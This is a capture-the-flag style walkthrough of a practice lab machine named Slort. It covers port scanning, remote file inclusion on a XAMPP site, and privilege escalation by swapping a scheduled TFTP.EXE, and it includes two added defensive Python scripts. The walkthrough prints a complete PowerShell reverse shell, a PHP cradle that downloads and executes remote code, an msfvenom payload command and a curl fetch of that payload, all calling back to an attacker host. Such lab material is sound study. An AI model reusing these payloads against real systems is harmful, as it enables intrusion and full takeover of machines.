Slort
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.182.53
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-10 10:43 EST
Nmap scan report for 192.168.182.53
Host is up, received reset ttl 125 (0.11s latency).
Scanned at 2025-11-10 10:43:18 EST for 195s
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 125 FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 125
3306/tcp open mysql syn-ack ttl 125 MariaDB 10.3.24 or later (unauthorized)
4443/tcp open http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.182.53:4443/dashboard/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
5040/tcp open unknown syn-ack ttl 125
8080/tcp open http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-open-proxy: Proxy might be redirecting requests
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.182.53:8080/dashboard/
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
<snipped>
We have FileZilla FTP running on port 21, SMB on port 445, and HTTP on ports 8080 and 4443.
HTTP (8080):
Visiting that port in Firefox, we are presented with the XAMPP welcome page.
Directory Fuzzing:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ gobuster dir -u http://192.168.182.53:8080 -w /usr/share/wordlists/dirb/common.txt -x php,html -t 40
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.182.53:8080
[+] Method: GET
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
<snipped>
/applications.html (Status: 200) [Size: 3607]
<snipped>
/dashboard (Status: 301) [Size: 351] [--> http://192.168.182.53:8080/dashboard/]
/favicon.ico (Status: 200) [Size: 30894]
/examples (Status: 503) [Size: 1060]
/img (Status: 301) [Size: 345] [--> http://192.168.182.53:8080/img/]
/index.php (Status: 302) [Size: 0] [--> http://192.168.182.53:8080/dashboard/]
/index.php (Status: 302) [Size: 0] [--> http://192.168.182.53:8080/dashboard/]
/Index.php (Status: 302) [Size: 0] [--> http://192.168.182.53:8080/dashboard/]
<snipped>
/site (Status: 301) [Size: 346] [--> http://192.168.182.53:8080/site/]
<snipped>
Progress: 18452 / 18452 (100.00%)
===============================================================
Finished
===============================================================
Navigate to that directory (/site):

Exploitation:
The URL parameter on that page immediately catches our attention.
Test it for LFI:

I could not go further with this.
But let's test for RFI as well:
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Slort/www]
└─$ echo 'test' >> test.txt
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Slort/www]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Open that file through the parameter:

┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Slort/www]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.182.53 - - [10/Nov/2025 11:56:21] "GET / HTTP/1.0" 200 -
192.168.182.53 - - [10/Nov/2025 11:56:44] "GET /test.txt HTTP/1.0" 200 -
We have RFI here.
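As an added defender-side example, not from the original writeup: the two inputs tried above (a traversal path and a remote URL) are easy to spot in the web server's own access log. This Python snippet scans constructed Apache combined-format log lines for query parameters that carry a remote URL or a traversal path; the parameter name 'page' is a hypothetical stand-in, since the writeup does not show the real one.

```python
"""Scan Apache access-log lines for query parameters that carry a remote URL
(RFI) or a path-traversal / absolute path (LFI). Sample lines are constructed."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-format log lines. The parameter name 'page' is a
# hypothetical stand-in; the writeup does not show the real parameter name.
SAMPLE_LOG = '''
192.168.45.187 - - [10/Nov/2025:11:56:44 -0500] "GET /site/index.php?page=http://192.168.45.187:8000/test.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.45.187 - - [10/Nov/2025:11:50:02 -0500] "GET /site/index.php?page=../../../../windows/win.ini HTTP/1.1" 200 90 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Nov/2025:12:01:10 -0500] "GET /site/index.php?page=about HTTP/1.1" 200 3607 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Nov/2025:12:01:11 -0500] "GET /dashboard/ HTTP/1.1" 200 7431 "-" "Mozilla/5.0"
'''

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
# URL schemes and PHP stream wrappers that pull attacker-controlled content
# into an include() when allow_url_include is enabled.
REMOTE_RE = re.compile(r'^\s*(https?|ftps?|php|data|expect)\s*:', re.IGNORECASE)
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')


def classify_value(value):
    """Return 'rfi', 'lfi' or None for one (possibly URL-encoded) parameter value."""
    v = unquote(value)
    if REMOTE_RE.match(v):
        return 'rfi'
    if TRAVERSAL_RE.search(v) or v.lower().startswith(('c:\\', '/etc/')):
        return 'lfi'
    return None


def scan_log(text):
    """Return (ip, status, param, kind) for every suspicious parameter value."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                       # blank or non-matching line
        query = urlsplit(m['target']).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            kind = classify_value(value)
            if kind:
                hits.append((m['ip'], int(m['status']), name, kind))
    return hits


if __name__ == '__main__':
    for ip, status, param, kind in scan_log(SAMPLE_LOG):
        print(f'{kind.upper():3} from {ip} via parameter {param!r} (HTTP {status})')
```

A 200 response to a flagged request, as in the first two sample lines, is the case worth escalating: the include succeeded rather than erroring out.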
I wrote this simple PHP script to download and execute a PowerShell script in memory:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ cat shell.ps1
$client = New-Object System.Net.Sockets.TCPClient('192.168.45.187',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ cat webshell.php
<?php
$web_cradle = system('powershell -c IEX(IWR -UseBasicParsing -Uri http://192.168.45.187:8000/shell.ps1)');
?>
Start a netcat listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ rlwrap nc -nlvp 4443
listening on [any] 4443 ...
Open that webshell.php through our RFI:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ rlwrap nc -nlvp 4443
listening on [any] 4443 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.182.53] 52425
PS C:\xampp\htdocs\site> whoami
slort\rupert
Here we have a reverse shell as rupert.
Post-Exploitation:
After some local enumeration, we find a Backup directory under C:\:
PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/20/2020 7:08 AM Backup
d----- 12/7/2019 1:14 AM PerfLogs
d-r--- 5/4/2022 1:06 AM Program Files
d-r--- 12/3/2021 8:22 AM Program Files (x86)
d-r--- 12/3/2021 8:29 AM Users
d----- 5/4/2022 1:52 AM Windows
d----- 6/12/2020 8:11 AM xampp
-a---- 11/10/2025 7:37 AM 2848 output.txt
PS C:\> cd Backup
PS C:\Backup> dir
Directory: C:\Backup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/12/2020 7:45 AM 11304 backup.txt
-a---- 6/12/2020 7:45 AM 73 info.txt
-a---- 6/23/2020 7:49 PM 73802 TFTP.EXE
PS C:\Backup> cat info.txt
Run every 5 minutes:
C:\Backup\TFTP.EXE -i 192.168.234.57 get backup.txt
So if we can put our own executable here in place of TFTP.EXE, we get a reverse shell as the user running this scheduled command.
Test if we can write to that directory:
PS C:\Backup> dir
Directory: C:\Backup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/12/2020 7:45 AM 11304 backup.txt
-a---- 6/12/2020 7:45 AM 73 info.txt
-a---- 11/10/2025 8:26 AM 8 test.txt
-a---- 6/23/2020 7:49 PM 73802 TFTP.EXE
PS C:\Backup> del test.txt
Yes we can.
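The writability test above is the check a defender should run proactively for every scheduled command. As an added example that is not part of the original writeup, this Python script takes the command line from info.txt plus a constructed, hypothetical icacls listing of the executable's directory, and reports the low-privilege principals that hold write-type rights there; the icacls output is an assumption, not the real ACL of the machine.

```python
"""Flag a scheduled command whose executable lives in a directory that
low-privilege principals can modify (the C:\\Backup\\TFTP.EXE case above)."""
import ntpath
import re

SCHEDULED_CMD = r'C:\Backup\TFTP.EXE -i 192.168.234.57 get backup.txt'

# Hypothetical `icacls C:\Backup` output, constructed for this example;
# it is not the real ACL of the machine in the writeup.
ICACLS_OUTPUT = r'''C:\Backup BUILTIN\Administrators:(I)(OI)(CI)(F)
          NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
          BUILTIN\Users:(I)(OI)(CI)(RX)
          NT AUTHORITY\Authenticated Users:(I)(M)
          NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
Successfully processed 1 files; Failed processing 0 files
'''

# Principals every ordinary user belongs to, and icacls rights that allow
# adding, replacing or deleting files inside a directory.
LOW_PRIV = {'everyone', r'builtin\users', r'nt authority\authenticated users'}
WRITE_RIGHTS = {'F', 'M', 'W', 'D', 'WD', 'AD', 'DC', 'DE', 'WDAC', 'WO'}
ACE_RE = re.compile(r'^(?P<who>[^:()]+):(?P<flags>(?:\([^)]*\))+)$')

def parse_icacls(text, path):
    """Return [(principal, {rights...}), ...] from `icacls <path>` output."""
    aces = []
    for raw in text.splitlines():
        line = raw.strip()
        if line.lower().startswith(path.lower() + ' '):
            line = line[len(path) + 1:]   # first line is prefixed with the path
        m = ACE_RE.match(line)
        if not m:
            continue                       # summary or blank line
        rights = set()
        for group in re.findall(r'\(([^)]*)\)', m['flags']):
            rights.update(r.strip() for r in group.split(','))
        aces.append((m['who'], rights))
    return aces

def exe_dir(cmdline):
    """Directory of the program a scheduled command line executes."""
    exe = cmdline[1:cmdline.index('"', 1)] if cmdline[:1] == '"' else cmdline.split(' ', 1)[0]
    return ntpath.dirname(exe)

def audit(cmdline, icacls_text):
    """Return (directory, sorted low-privilege principals with write-type rights)."""
    directory = exe_dir(cmdline)
    risky = {who for who, rights in parse_icacls(icacls_text, directory)
             if who.lower() in LOW_PRIV and rights & WRITE_RIGHTS}
    return directory, sorted(risky)
```

A non-empty list from audit() means any authenticated user can swap the binary the task runs, which is the exact condition the rest of this section exploits; the fix is to move the binary under a directory writable only by administrators.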
Create a reverse shell with msfvenom:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.187 LPORT=4443 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7680 bytes
Saved as: shell.exe
Back up the original TFTP.EXE and fetch our shell.exe in its place:
PS C:\Backup> move-item tftp.exe tftp.exe.bak
PS C:\Backup> dir
Directory: C:\Backup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/12/2020 7:45 AM 11304 backup.txt
-a---- 6/12/2020 7:45 AM 73 info.txt
-a---- 6/23/2020 7:49 PM 73802 tftp.exe.bak
PS C:\Backup> curl http://192.168.45.187:8000/shell.exe -o TFTP.EXE
PS C:\Backup> dir
Directory: C:\Backup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/12/2020 7:45 AM 11304 backup.txt
-a---- 6/12/2020 7:45 AM 73 info.txt
-a---- 11/10/2025 8:35 AM 7680 TFTP.EXE
-a---- 6/23/2020 7:49 PM 73802 tftp.exe.bak
Start another netcat listener and wait up to 5 minutes:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ rlwrap nc -nlvp 4443
listening on [any] 4443 ...
After waiting about 4 minutes, we get a reverse shell:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ rlwrap nc -nlvp 4443
listening on [any] 4443 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.182.53] 53122
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
slort\administrator
Get the flags:
C:\WINDOWS\system32>type C:\Users\Administrator\Desktop\proof.txt
9a44be6d7326dca2de6a836989baabc4
C:\WINDOWS\system32>type C:\Users\rupert\Desktop\local.txt
a0e693a29df1aa3f344d200cc3cf4a40